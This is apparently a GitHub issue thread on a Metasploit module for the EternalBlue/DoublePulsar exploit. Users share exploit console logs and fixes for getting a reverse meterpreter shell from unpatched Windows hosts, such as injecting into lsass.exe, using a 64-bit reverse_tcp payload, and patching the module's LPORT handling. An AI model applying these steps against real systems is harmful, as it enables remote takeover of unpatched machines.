Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1

Attack success does not return shell #8

Open smile0304 opened 7 years ago

smile0304 commented 7 years ago

Hello developer, how should I solve it?

[] Started reverse TCP handler on 192.168.12.110:8888
[] 192.168.12.106:445 - Generating Eternalblue XML data
[] 192.168.12.106:445 - Generating Doublepulsar XML data
[] 192.168.12.106:445 - Generating payload DLL for Doublepulsar
[] 192.168.12.106:445 - Writing DLL in /root/8888.dll
[] 192.168.12.106:445 - Launching Eternalblue...
[+] 192.168.12.106:445 - Backdoor is already installed
[] 192.168.12.106:445 - Launching Doublepulsar...
[+] 192.168.12.106:445 - Remote code executed... 3... 2... 1...
[] Exploit completed, but no session was created.

UrielRicardo commented 7 years ago

@smile0304 See if your TCP port is allowed on the network; in my case it was not! In your case, 8888.

If you do not know, use your 4G internet.

msdnteam commented 7 years ago

Change: PROCESSINJECT wlms.exe/lsass.exe or other

ingjieye commented 7 years ago

I have the same issue. Did you solve it yet?

ingjieye commented 7 years ago

Hi, I just solved the problem. I changed PROCESSINJECT to lsass.exe and then I got the shell. Though my target is running Win7 x86 and it says "Change to lsass.exe for x64".

smile0304 commented 7 years ago

The listening port cannot be modified; try using the default port 4444. I tested for two days to find this problem.

RubyistCTRLDYT commented 7 years ago

Change the processinject to svchost.exe for win7 x86

LeionTong commented 7 years ago

You can also use explorer.exe as the processinject for win7 x86

LukaSikic commented 7 years ago

None of these worked for me.. svchost.exe gave me BSOD and restarted haha.. still doesn't work in Win 7 x86

sithis993 commented 7 years ago

I managed to solve this issue, and it may work for you guys too. I tried all of these steps but still received the error "Exploit completed but no session was created".

If you're exploiting a 64 bit machine, make sure that you set the payload to a 64 bit meterpreter payload. In my case I used:

set payload windows/x64/meterpreter/reverse_tcp

As soon as I made this change, I got a meterpreter shell! In the image below, you can see the original error, the exact change I made, and then the resulting success:

image

LukaSikic commented 7 years ago

I also managed to solve it by using port 4444 and changing PROCESSINJECT to lsass.exe (even if target machine is x86).. 👍

ant0n1o commented 7 years ago

For x64 machines: LPORT=4444, payload set to windows/x64/meterpreter/reverse_tcp or https. I realized my firewall was restricting communication on any port other than 4444, 443 and 80.

slonkak commented 7 years ago

I'm in the same but slightly different boat. I'm attacking a 2008r2 x64 host from an x86 kali host. I tried all of the suggestions in this and numerous other threads but I get the exact same output as the OP. It looks like it works but I never get a shell back. Do I need to switch to 64-bit kali so wine can make a 64 bit dll? Or does anyone know what's going wrong?

slonkak commented 7 years ago

Update: I downloaded the 64 bit kali and it still doesn't work.

H8to commented 7 years ago

I wonder why this will not work for other ports than 4444. I tried several systems with PROCESSINJECT lsass.exe (including x86) but the payload only succeeds if one chooses the port 4444. Any idea which could be the root cause for this? Other people here have the same issue it seems. No firewall between.

Thanks

LukaSikic commented 7 years ago

@H8to I think developers like port 4444 so much that they hard-coded it somewhere or they just like when we bash our keyboards.

H8to commented 7 years ago

Yeah, I looked for it, but it seems at least in the XML config files there is no sign of it. Or do you mean by the original developers? :D I wonder why a spy software would use ports other than 443 or 80 :confused:

If I think about it.. DoublePulsar is only taking care of the dll injection. There should be no issues with generating a reverse shell payload with ports other than 4444 as this is done by Metasploit.

Update: After line 96 add pay.datastore['LPORT'] = datastore['LPORT']

I did not test this yet, as I don't have a VM with me, but it might do the trick.

ghost commented 6 years ago

run

[] Started reverse TCP handler on 192.168.244.133:4444
[] 172.16.2.222:3269 - Generating Eternalblue XML data
[] 172.16.2.222:3269 - Generating Doublepulsar XML data
[] 172.16.2.222:3269 - Generating payload DLL for Doublepulsar
[] 172.16.2.222:3269 - Writing DLL in /root/.wine/drive_c/eternal11.dlleternal11.dll
[] 172.16.2.222:3269 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 172.16.2.222:3269 - Are you sure it's vulnerable?
[] 172.16.2.222:3269 - Launching Doublepulsar...
[-] 172.16.2.222:3269 - Oops, something was wrong!
[] Exploit completed, but no session was created.

Same error. Any solutions?

pzohner commented 6 years ago

Could someone please explain how to change the PROCESSINJECT to lsass.exe? I don't see that in the "show options"

X0R1972 commented 6 years ago

Guys, is this still working? Because I read in many forums and on the securityonline website that it is fixed by a Microsoft patch and not working anymore.

UrielRicardo commented 6 years ago

@pzohner set PROCESSINJECT lsass.exe

UrielRicardo commented 6 years ago

@mateo24xx Actually, if the machine has already been updated and has received the updates of the MS17-010 bulletin, this attack will not work.

bucky67gto commented 6 years ago

@H8to did you ever test using another port, i.e.

After line 96 add pay.datastore['LPORT'] = datastore['LPORT']

elfnight0 commented 5 years ago

only disable firewall modem or restart modem

fix ?